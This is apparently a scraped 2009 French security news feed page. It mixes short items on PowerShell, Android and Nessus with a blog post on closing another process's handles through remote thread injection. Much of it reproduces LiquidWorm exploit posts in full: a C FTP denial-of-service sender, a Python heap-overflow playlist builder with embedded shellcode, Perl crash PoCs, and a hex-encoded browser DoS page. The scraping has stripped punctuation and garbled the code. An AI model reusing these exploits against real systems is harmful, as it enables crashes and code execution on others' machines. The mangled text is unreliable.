session remotely using“Set-PSSessionConfiguration” cmdlet The –ShowSecurityDescriptorUIparameter will show a nice UI to make these decisions easilyThanksKrishnaWindows PowerShell DevelopmentThis posting is provided “AS IS” with no warrantiesIMAGEhttp://www.secuobs.com/revue/news/106081.shtmlhttp://www.secuobs.com/revue/news/106081.shtml 2009-06-04 19:36:34 - milw0rm.com : http://www.secuobs.com/revue/news/105886.shtmlhttp://www.secuobs.com/revue/news/105886.shtml 2009-06-04 19:36:34 - milw0rm.com : http://www.secuobs.com/revue/news/105882.shtmlhttp://www.secuobs.com/revue/news/105882.shtml 2009-06-04 19:36:34 - milw0rm.com : http://www.secuobs.com/revue/news/105881.shtmlhttp://www.secuobs.com/revue/news/105881.shtml 2009-06-04 19:36:34 - milw0rm.com : http://www.secuobs.com/revue/news/105880.shtmlhttp://www.secuobs.com/revue/news/105880.shtml 2009-06-04 19:36:34 - milw0rm.com : http://www.secuobs.com/revue/news/105879.shtmlhttp://www.secuobs.com/revue/news/105879.shtml 2009-06-04 17:36:57 - PeetersOnline.nl : The following Powershell functions allow you to manage querying, creatingand removing scheduled tasks on one or more computers remotely Thefunctions use schtasksexe, which is included in Windows Unlike theWin32_ScheduledJob WMI class, the schtasksexe commandline tool willshow manually created tasks, as well as script-created ones Theexamples show some, but not all parameters Related posts:1 List ALL properties and subproperties of a variable in Powershell2 List ALL available properties in the VI Toolkit3 Get SQL database size using Windows Powershellhttp://www.secuobs.com/revue/news/105850.shtmlhttp://www.secuobs.com/revue/news/105850.shtml 2009-06-04 14:24:56 - Biometrics Resource findBIOMETRICS.com : Wireless Keypad System Lets Homeowners Control and Monitor Door Accesshttp://www.secuobs.com/revue/news/105761.shtmlhttp://www.secuobs.com/revue/news/105761.shtml 2009-06-04 13:40:48 - gHacks technology news : Google’s Android operating system is still only available in the T-MobileG1 cell phone Cell phone manufacturers and Google are howeverplanning to release at least 18 Android based devices in this yearalone which will surely help in gaining market share in the cell phonemarket T-Mobile G1 users can access the Android Market to http://www.secuobs.com/revue/news/105746.shtmlhttp://www.secuobs.com/revue/news/105746.shtml 2009-06-04 00:37:19 - milw0rm.com : http://www.secuobs.com/revue/news/105600.shtmlhttp://www.secuobs.com/revue/news/105600.shtml 2009-06-04 00:37:19 - milw0rm.com : http://www.secuobs.com/revue/news/105599.shtmlhttp://www.secuobs.com/revue/news/105599.shtml 2009-06-03 18:01:37 - milw0rm.com : http://www.secuobs.com/revue/news/105459.shtmlhttp://www.secuobs.com/revue/news/105459.shtml 2009-06-03 18:01:37 - milw0rm.com : http://www.secuobs.com/revue/news/105457.shtmlhttp://www.secuobs.com/revue/news/105457.shtml 2009-06-03 07:53:39 - Security Bloggers Network : Sometimes security and functionality are a trade-off But what about whendifferent aspects of security are at odds There’s one less of thosecases to worry about thanks to a feature that Tenable added to Nessusrecently The Windows Remote Registry service, as the name implies,allows remote calls to the registry The service is required http://www.secuobs.com/revue/news/105258.shtmlhttp://www.secuobs.com/revue/news/105258.shtml 2009-06-03 00:12:00 - milw0rm.com : http://www.secuobs.com/revue/news/105129.shtmlhttp://www.secuobs.com/revue/news/105129.shtml 2009-06-03 00:12:00 - milw0rm.com : http://www.secuobs.com/revue/news/105127.shtmlhttp://www.secuobs.com/revue/news/105127.shtml 2009-06-02 19:44:46 - milw0rm.com : http://www.secuobs.com/revue/news/105039.shtmlhttp://www.secuobs.com/revue/news/105039.shtml 2009-06-02 19:44:46 - milw0rm.com : http://www.secuobs.com/revue/news/105038.shtmlhttp://www.secuobs.com/revue/news/105038.shtml 2009-06-02 19:29:18 - ReverseConnection : IBM WebSphere MQ Remote Buffer Overflow Vulnerability Source: click herehttp://www.secuobs.com/revue/news/105013.shtmlhttp://www.secuobs.com/revue/news/105013.shtml 2009-06-02 15:38:58 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/104944.shtmlhttp://www.secuobs.com/revue/news/104944.shtml 2009-06-02 15:29:57 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : Une vulnérabilité a été rapportée dans SafeNet SoftRemote, qui pourraitêtre exploitée par des personnes malintentionnées afin de compromettreun système vulnérablehttp://www.secuobs.com/revue/news/104930.shtmlhttp://www.secuobs.com/revue/news/104930.shtml 2009-06-02 14:34:51 - 0vercl0k's blog. : Bonjour à tous,me revoilà après un petit peu d'absence ,tout cela par la faute desvacances scolaires et des fêtes bien sureTrêve de plaisanterie ,en cette nouvelle année je reprend mon petitrégime hebdomadaireAujourd'hui c'est un post de Ivanlef0u qui attire mon attention :Playing with windows handleDans ce post il explique comment récupérer le type d'un handle ainsique son nomBien sure on utilise encore une fois la belle api windows ainsi quequelques fonctions ,venues tout droit de ntdllCeci dis j'ai voulus moi même tenter l'expérience ,en codantexactement ce qu'il avait déjà réaliséCela permet de mettre des petites choses au point ,être sois mêmeconfronté aux problèmes éventuels et j'en passeCependant j'ai décidé d'utilisé ce petit code afin de m'amuser avecles handles de type fileNotre but ,va donc être de fermer un handle file d'un processus Comme vous le savez peut être ,chaque processus possèdent des handlesouvert sur des objets qui peuvent être :- des files- des events- des mutexs- des pipes et j'en passeAllez voir par ici ,notre fabuleuse msdn :http://msdn2microsoftcom/en-us/library/ms724251aspxJe vais donc vous expliquez comment on va opérer :- Tous d'abord ,on doit récupérer des informations sur tous leshandles ouvert sur le système ,on utilisera ntQuerySystemInformationavec l'argument SystemHandleInformation- Ensuite on doit trier les structures ,afin de garder seulementcelles qui concernent notre processus ,on compare donc le membre de lastruct spécifiant le PID avec le PID de notre processus- A présent on doit retrouver le type de handle auquel nous avons afaire ,on duplique notre handle afin de query des informations dessus,duplicateHandle donc- Une fois dupliqué nous pouvons utiliser NtQueryObject afin d'obtenirson type- A présent ,si vous lisez le post Ivanlef0u il parle d'un bug auniveau des types files : et bien en effet on est obligé d'implanterune petite astuce permettant de savoir si oui ou non notre fonctionest bloquanteOn lance donc des threads qui s'occupe de récupérer le nom du handle,seulement si il dépasse le timeout on les closeLe thread va donc s'occuper de remplir notre structure ,que noustraiterons dans la fonction qui l'appel- On compare le nom avec le fichier que nous voulons fermer ,et onlance notre fonction CloseHandleCette fonction utilise un système que l'on a largement travaillé ,aufil de se blog : l'exécution de code bien sureOn créer un thread dans notre processus cible sur la fonctionCloseHandle ,on lui passe un pointeur sur notre handle et BIM closedVoilà en gros le petit codeCelui-ci est peut être assez 'velus' à lire ,des structures enpagailles et tous cela dans un seul fichierTous cela pour dire que n'hésiter pas à utiliser les headers etcompagniePour tester ce petit programme ,j'ai codé un petit fopen ,qui secharge de garder le fichier ouvert ,on peut alors lancer le close denotre handlePlace au concret ,voici un petit screenshot :et un petit dernier :Maintenant le principale ,les codes :-CloseAFuckingFileHandlec-HandleOpencVoici quelques liens intéréssants :-Je vous conseille de telecharger le SDK ,elle contient de la docconcernant certaines apis natives-ZwQueryInformationFile -http://wwwosronlinecom/DDKx/kmarch/k111_9pyqhtm-Playing with windows Handles -http://wwwivanlef0utuxfamilyorg/p=13PS : un petit merci à wizardman pour sa générosité concernant le futurdns : ainsi que Nam_K PS2 : merci à blackclowns pour son zine ,vraiment technique un grandmerciPS3 : Le blog est actuellement disponible avec l'adresse suivant :www0vercl0kfrIMAGEhttp://www.secuobs.com/revue/news/104784.shtmlhttp://www.secuobs.com/revue/news/104784.shtml 2009-06-02 02:42:33 - News : WiMax operator Clearwire will use software from Mformation to activateand upgrade client devices in the fieldread moreIMAGEhttp://www.secuobs.com/revue/news/104610.shtmlhttp://www.secuobs.com/revue/news/104610.shtml 2009-06-01 23:56:10 - milw0rm.com : http://www.secuobs.com/revue/news/104576.shtmlhttp://www.secuobs.com/revue/news/104576.shtml 2009-06-01 23:56:10 - milw0rm.com : http://www.secuobs.com/revue/news/104575.shtmlhttp://www.secuobs.com/revue/news/104575.shtml 2009-06-01 23:56:10 - milw0rm.com : http://www.secuobs.com/revue/news/104574.shtmlhttp://www.secuobs.com/revue/news/104574.shtml 2009-06-01 21:40:26 - News : Quantum Corp today announced a new backup appliance for remoteoffices that combines data deduplication, replication and system-widemonitoring software for centralizing backup controlread moreIMAGEhttp://www.secuobs.com/revue/news/104533.shtmlhttp://www.secuobs.com/revue/news/104533.shtml 2009-06-01 19:26:43 - milw0rm.com : http://www.secuobs.com/revue/news/104492.shtmlhttp://www.secuobs.com/revue/news/104492.shtml 2009-06-01 19:26:43 - milw0rm.com : http://www.secuobs.com/revue/news/104490.shtmlhttp://www.secuobs.com/revue/news/104490.shtml 2009-06-01 19:26:43 - milw0rm.com : http://www.secuobs.com/revue/news/104489.shtmlhttp://www.secuobs.com/revue/news/104489.shtml 2009-06-01 19:26:43 - milw0rm.com : http://www.secuobs.com/revue/news/104488.shtmlhttp://www.secuobs.com/revue/news/104488.shtml 2009-06-01 19:26:43 - milw0rm.com : http://www.secuobs.com/revue/news/104486.shtmlhttp://www.secuobs.com/revue/news/104486.shtml 2009-06-01 19:26:43 - milw0rm.com : http://www.secuobs.com/revue/news/104485.shtmlhttp://www.secuobs.com/revue/news/104485.shtml 2009-06-01 16:46:22 - ReverseConnection : OpenSSL ‘zlib’ Compression Memory Leak Remote Denial of ServiceVulnerability Source: click herehttp://www.secuobs.com/revue/news/104413.shtmlhttp://www.secuobs.com/revue/news/104413.shtml 2009-05-31 23:53:32 - LiquidWorm's Blog : ################################################################################### Title: Mp3 Tag Assistant Pro 292 tag metadata Remote StackOverflow PoC### Summary: MP3 Tag Assistant Professional 292 is aprofessional-level audiotag editor with UNICODE support### Product web page: http://wwwassistanttoolscom/### Desc: MP3 Tag Assistant Professional 292 is vulnerable to a stackbufferoverflow attack when loading a malicious mp3 file or file thatsupportstags filled with overly long A's in its metadata id3v1, id3v2 apev2,etc To succesfully exploit this issue you have to change the hexvalues of the file and remove the null bytes in the metadata headerI'm being lazy this season so ; You can take any mp3 file,edit its metadata with some mp3 tag editor ironic, isen't it andfill every field with long string of bytes* I think that this issue is affecting many softwares out there thatdeals with playing mp3 files or any other file that supports tagsmetadata So knock your socks offt00t w00tThis is the same PoC as: http://zeroscienceorg/codes/aimp2_poctxtSo I'll use the same mp3 file aimp2_evilmp3 which is a song byGary Jules - Mad World, and it's approximately 292 megabytesProof of Concept: http://wwwzeroscienceorg/codes/aimp2_evilmp3### Tested on Microsoft Windows XP Professional SP3 English### WinDbg log:---------------------------------------------------------------------------------c5ceb0: Access violation - code c0000005 first chanceFirst chance exceptions are reported before any exception handlingThis exception may be expected and handledeax=001093d4 ebx=00000000 ecx=00bc7f7c edx=00bc7f7c esi=0010a658edi=00109414eip=00410056 esp=00109418 ebp=00410041 iopl=0 nv up ei ng nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010282*** WARNING: Unable to verify checksum for pathMp3 Tag AssistantProexe*** ERROR: Module load completed but symbols could not be loaded forpathMp3 Tag Assistant ProexeMp3_Tag_Assistant_Pro+0x10056:00410056 008b45085068 add byte ptr ebx+68500845h,clds:0023:68500845=0:000 gc5ceb0: Access violation - code c0000005 second chance eax=001093d4 ebx=00000000 ecx=00bc7f7c edx=00bc7f7c esi=0010a658edi=00109414eip=00410056 esp=00109418 ebp=00410041 iopl=0 nv up ei ng nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000282Mp3_Tag_Assistant_Pro+0x10056:00410056 008b45085068 add byte ptr ebx+68500845h,clds:0023:68500845=---------------------------------------------------------------------------------### OllyDbg log:http://img241imageshackus/img241/6766/mp3tagollyjpg### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic### liquidworm gmail com### http://wwwzeroscienceorg/### 31052009################################################################################http://zeroscienceorg/codes/mp3tag_boftxtIMAGEhttp://www.secuobs.com/revue/news/104289.shtmlhttp://www.secuobs.com/revue/news/104289.shtml 2009-05-31 20:06:59 - Windbg by Volker von Einem : Mark has published a very good article about Remote Debugging on theMicrosoft Advanced Windows Debugging and Troubleshooting BlogEnjoyIMAGEhttp://www.secuobs.com/revue/news/104202.shtmlhttp://www.secuobs.com/revue/news/104202.shtml 2009-05-31 19:53:45 - LiquidWorm's Blog : ========================================================/*********************************************************************************************************** Title: WFTPD Pro Server 33001 pre auth Multiple Remote Denialof Service Vulnerabilities** Summary: Professional FTP server for Windows NT / 2000 / XP / 2003** Desc: WFTPD Pro Server 33001 suffers from multiple remotevulnerabilities which resolves* in denial of service Several commands are vulnerable including:LIST, MLST, NLST, NLST -al,* STAT and maybe more** Product web page: http://wwwwftpdcom/** Tested on Microsoft Windows XP Professional SP2 English** Vulnerability discovered by Gjoko 'LiquidWorm' Krstic** liquidworm t00t gmail w00t com** http://wwwzeroscienceorg/** 26012009*********************************************************************************************************/#include #include #include #include #include #include #include #include #include void headervoid;int main int argc, char *argv{int sckt = 0, sfd = 0;unsigned char payload="x4Ex4Cx53x54x20x2Dx61x6Cx20" // NLST -al// "x4Cx49x53x54 - LIST, x4Dx4Cx53x54 - MLST, x4Ex4Cx53x54- NLST, x53x54x41x54 - STAT +x20"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41""x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"// 1400 bytes"xDxA";header;ifargc = 2{printf"Usage: %s ip", argv0;return EXIT_SUCCESS;}struct sockaddr_in dos_ftp;sfd = socketAF_INET, SOCK_STREAM, 0;ifsfd 0{perror"Socket";printf"Error creating socket";return1;}printf"+ Socket created";sleep 1;memsetetdos_ftp, 0x0, sizeofdos_ftp;dos_ftpsin_family = AF_INET;dos_ftpsin_addrs_addr = inet_addrargv1;dos_ftpsin_port = htons21;sckt = connectsfd, struct sockaddr * etdos_ftp, sizeofdos_ftp;ifsckt 0{perror"Connect";printf"Error connecting";return1;}printf"+ Connection established";sleep 1;printf"+ Sending malicious payload to %s ", argv1;sleep2;sendsfd, payload, sizeofpayload, 0;printf"+ Malicious payload succesfully sent";sleep 1;printf"+ WFTPD on %s has crashed", argv1;close sfd;return0;}void header{printf"--------------------------------------------------------------------------------";printf" WFTPD Pro Server 33001 pre auth Remote Denial ofService Exploit";printf" by LiquidWorm ";printf"--------------------------------------------------------------------------------";}========================================================http://wwwpacketstormsecurityorg/filedesc/wftpdpro_dosctxthtmlhttp://wwwsecurityfocuscom/bid/33426http://wwwzeroscienceorg/codes/wftpdpro_doscIMAGEhttp://www.secuobs.com/revue/news/104129.shtmlhttp://www.secuobs.com/revue/news/104129.shtml 2009-05-31 19:53:45 - LiquidWorm's Blog : ----------------------------------------------------#/usr/bin/python## Title: BlazeVideo HDTV Player = 35 PLF Playlist File Remote HeapOverflow Exploit## Summary: BlazeVideo HDTV Player BlazeDTV is a full-featured andeasy-to-use HDTV# Player software, combining HDTV playback, FM receiving, video recordand DVD playback# functions You can make advantage of PC monitor's high resolution,watch, record, playback# high definition HDTV program or teletext broadcast program## Product web page: http://wwwblazevideocom/hdtv-player/indexhtm## Tested on Microsoft Windows XP Professional SP2 English##------------------------------------windbg------------------------------------## 620d74: Access violation - code c0000005 first chance# First chance exceptions are reported before any exception handling# This exception may be expected and handled# eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0edi=00000001# eip=43434343 esp=0013f288 ebp=6405247c iopl=0 nv up ei pl nz ac penc# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216# 43434343 ##--------------------------------------------------------------------------------## Vulnerability discovered by Gjoko 'LiquidWorm' Krstic## liquidworm t00t gmail w00t com## http://wwwzeroscienceorg/## 03022009#print"--------------------------------------------------------------------------"print " BlazeVideo HDTV Player = 35 Playlist File Remote HeapOverflow Exploit"print " by LiquidWorm liquidwormt00tgmailcom - 2009"print"--------------------------------------------------------------------------"buffer = "x41" * 260eip = "xc0x25x49x7e" #jmp esp user32dllnop = "x90" * 15# win32_exec - EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2http://metasploitcomshellcode = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49""x49x49x49x49x49x49x49x49x49x49x49x51x5ax48x6ax65""x58x30x42x31x50x42x41x6bx41x41x75x32x41x42x32x42""x41x30x42x41x41x58x38x41x42x50x75x39x79x6bx4cx4a""x48x47x34x43x30x45x50x57x70x4cx4bx71x55x77x4cx4c""x4bx71x6cx37x75x30x78x75x51x78x6fx4cx4bx52x6fx32""x38x4cx4bx63x6fx45x70x55x51x5ax4bx31x59x6cx4bx44""x74x6cx4bx55x51x4ax4ex76x51x49x50x6dx49x4cx6cx4e""x64x6fx30x30x74x43x37x7ax61x59x5ax36x6dx46x61x6a""x62x58x6bx7ax54x45x6bx76x34x47x54x64x44x53x45x79""x75x4cx4bx63x6fx51x34x67x71x4ax4bx50x66x4cx4bx76""x6cx30x4bx4cx4bx43x6fx67x6cx34x41x58x6bx6ex6bx75""x4cx6cx4bx37x71x38x6bx6cx49x63x6cx54x64x44x44x79""x53x50x31x69x50x63x54x4cx4bx63x70x34x70x4bx35x4f""x30x53x48x56x6cx6ex6bx71x50x76x6cx4cx4bx34x30x45""x4cx4cx6dx4ex6bx50x68x55x58x5ax4bx54x49x4cx4bx6f""x70x4ex50x55x50x63x30x75x50x4cx4bx72x48x55x6cx71""x4fx45x61x39x66x41x70x72x76x4fx79x6bx48x4dx53x4f""x30x73x4bx50x50x50x68x6ax4fx48x4ex6dx30x43x50x62""x48x6fx68x4bx4ex4fx7ax74x4ex46x37x39x6fx69x77x41""x63x50x6fx70x6cx75x50x65"payload = garbage + eip + nop + shellcode + noptry:out_file = open"Groundhog_Dayplf",'w'out_filewritepayloadout_filecloseraw_input"* Evil playlist successfully createdPress anykey to continue"except:print "Oops"----------------------------------------------------http://wwwsecurityfocuscom/bid/33588http://wwwpacketstormsecurityorg/filedesc/blazehdtv-hoftxthtmlIMAGEhttp://www.secuobs.com/revue/news/104128.shtmlhttp://www.secuobs.com/revue/news/104128.shtml 2009-05-31 19:53:45 - LiquidWorm's Blog : ------------------------#/usr/local/bin/perl## Title: Got All Media 7003 Remote Denial Of Service Exploit# Product web page: http://wwwgallmcom/defaultaspx## Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# liquidworm t00t gmail w00t com# http://wwwzeroscienceorg# 19022009#print "* t00ting";use LWP::Simple;my $url = 'http://127001:5550/t00t';my $freeze = get $url;die "Couldn't get $url" unless defined $freeze;------------------------http://wwwzeroscienceorg/codes/gotallmedia_dostxthttp://wwwsecurityfocuscom/bid/33830IMAGEhttp://www.secuobs.com/revue/news/104126.shtmlhttp://www.secuobs.com/revue/news/104126.shtml 2009-05-31 19:53:45 - LiquidWorm's Blog : --------------------------------------------------------#/usr/bin/perl## Title: JDKChat v15 Remote Integer Overflow PoC## Summary: JDKChat is a simple C++ chat server for GNU/Linux systems# Users can connect to it through a simple tcp client like telnet## WebSite : http://wwwjdkoftinoffcom/## ---------------------------- Demo ---------------------------------# aleks@tux ~ $ telnet 19216801 7777# Trying 19216801# Connected to 19216801# Escape character is '^'# Welcome To jdkchat v15 by JD Koftinoff Software, Ltd# http://wwwjdkoftinoffcom/# and modified by Aditya Godbole urwithaditya@gmxnet# Commands available:# /who -- list all users along with their connection numbers# /exit -- exit chat room# /local -- toggle local mode for your telnet session# /connection number message -- send private message to user at# specified connection number### JDKCHAT: Aleks just entered the room# JDKCHAT: Users = Aleks:0# Aleks ### // And after we run the PoC :## JDKCHAT: PwNzOr just entered the room# Aleks Connection closed by foreign host# aleks@tux ~ $## ---------------------------- /Demo --------------------------------### Vulnerability discovered by n3tpr0b3 et LiquidWorm## n3tpr0b3 AT gmail com## 12032009#use IO::Socket;if $#ARGV = 1 {print "JDKChat v15 Remote Integer Overflow PoC By n3tpr0b3=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# Usage : jdkchat_pocpl SrvIP SrvPort ## Greetz to LiquidWorm #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-";exit;}my $dupsa = new IO::Socket::INET PeerAddr = "$ARGV0",PeerPort = "$ARGV1",Proto = "tcp"or die "Could not connect to $ARGV0: $";sleep 1;print $dupsa "x50x77x4ex7ax4fx72x0d";print "#-- Loged on t3h JDKChat server";sleep 1;print "#-- Sending our evil command ";sleep 2;print $dupsa "x2fx2dx31x0d";close$dupsa;print "#-- Server pwned ";-------------------------------------------------------http://zeroscienceorg/codes/jdkchat_poctxtIMAGEhttp://www.secuobs.com/revue/news/104124.shtmlhttp://www.secuobs.com/revue/news/104124.shtml 2009-05-31 19:53:45 - LiquidWorm's Blog : ##################################################################################### QtWeb Internet Browser 20 build 043 Remote Denial of ServiceExploit smile## Summary: QtWeb is compact, portable and secure web browser havingsome unique UI# and privacy features QtWeb is an open source project based onNokia's Qt framework# former Trolltech and Apple's WebKit rendering engine the same asbeing used in# Apple Safari and Google Chrome## Happy Exploit## Product web page: http://wwwqtwebnet/## Vulnerability discovered by Gjoko 'LiquidWorm' Krstic## liquidworm gmail com## http://wwwzeroscienceorg/## 01042009####################################################################################$S="x3Cx68x74x6Dx6Cx3Ex0Dx0A""x3Cx74x69x74x6Cx65x3Ex51x74x57x65x62""x20x49x6Ex74x65x72x6Ex65x74x20x42x72x6Fx77x73x65""x72x20x32" "x2Ex30x20""x28x62" "x75x69""x6Cx64" "x20x30""x34x33" "x29x20""x52x65" "x6Dx6F""x74x65" "x20x44""x65x6E" "x69x61""x6Cx20" "x6Fx66""x20x53" "x65x72""x76x69" "x63x65""x20x45" "x78x70""x6Cx6F" "x69x74" "x3Cx2F" "x54x69""x74x6C" "x65" "x3E" "x0D" "x0A" "x3Cx68""x65x61" "x64" "x3E" "x3C" "x62" "x6Fx64""x79x3E" "x3C" "x73" "x63" "x72" "x69x70""x74x20" "x74x79""x70x65" "x3Dx22""x74x65" "x78x74""x2Fx6A" "x61x76""x61x73" "x63x72""x69x70" "x74x22""x3Ex0D" "x0Ax61""x6Cx65" "x72x74""x28x22" "x51x74""x57x65" "x62x20""x49x6E" "x74x65""x72x6E" "x65x74""x20x42" "x72x6F""x77x73" "x65x72""x20x32" "x2Ex30""x20x28" "x62" "x75" "x69x6C""x64x20" "x30" "x34" "x33x29""x20x52" "x65" "x6D" "x6Fx74""x65x20" "x44" "x65" "x6Ex69""x61x6C" "x20" "x6F" "x66x20""x53x65" "x72" "x76" "x69x63""x65x20" "x45" "x78" "x70x6C""x6Fx69" "x74" "x5C" "x6Ex5C""x6Ex5C" "x74" "x5C" "x74x5C""x74x62" "x79" "x20" "x4Cx69""x71x75" "x69" "x64" "x57x6F""x72x6D" "x20" "x28" "x63x29""x20x32" "x30" "x30" "x39x22""x29x3B" "x0Dx0Ax66" "x75x6E""x63x74" "x69x6F""x6Ex20" "x64x6F""x7Ax28" "x29x20""x7Bx0D" "x0Ax74""x69x74" "x6Cx65""x3Dx22" "x48x6F""x74x20" "x49x63""x65x22" "x3Bx0D""x0Ax75" "x72x6C""x3Dx22" "x68x74""x74x70x3A" "x2Fx2Fx77""x77x77x2Ex6Dx69x6Cx77x30x72x6Dx2Ex63x6Fx6Dx2F""x22x3Bx0Dx0Ax69x66x20x28x77x69x6Ex64""x6Fx77x2Ex73x69x64x65x62";$M="x61" "x72" "x29" "x20""x7B" "x0D" "x0A" "x77" "x69""x6E""x64" "x6F" "x77" "x2E""x73" "x69" "x64" "x65""x62" "x61" "x72" "x2E""x61" "x64" "x64" "x50""x61" "x6E" "x65" "x6C""x28" "x74" "x69" "x74""x6C" "x65" "x2C" "x20""x75" "x72" "x6C" "x2C""x22" "x22" "x29" "x3B""x0D" "x0A""x7D""x20" "x65" "x6C""x73";$I="x65x20x69x66x28x20x77""x69x6Ex64x6Fx77""x2Ex65x78x74x65x72x6E""x61x6Cx20x29x20" ##############"x7Bx0Dx0Ax77x69x6Ex64" ## #"x6Fx77x2Ex65""x78" ######"x74x65x72x6Ex61" ########## _ _ _"x6Cx2Ex41x64x64x46x61x76x6Fx72x69" #==---- #==----#==----"x74x65x28x20x75""x72x6Cx2Cx20x74" 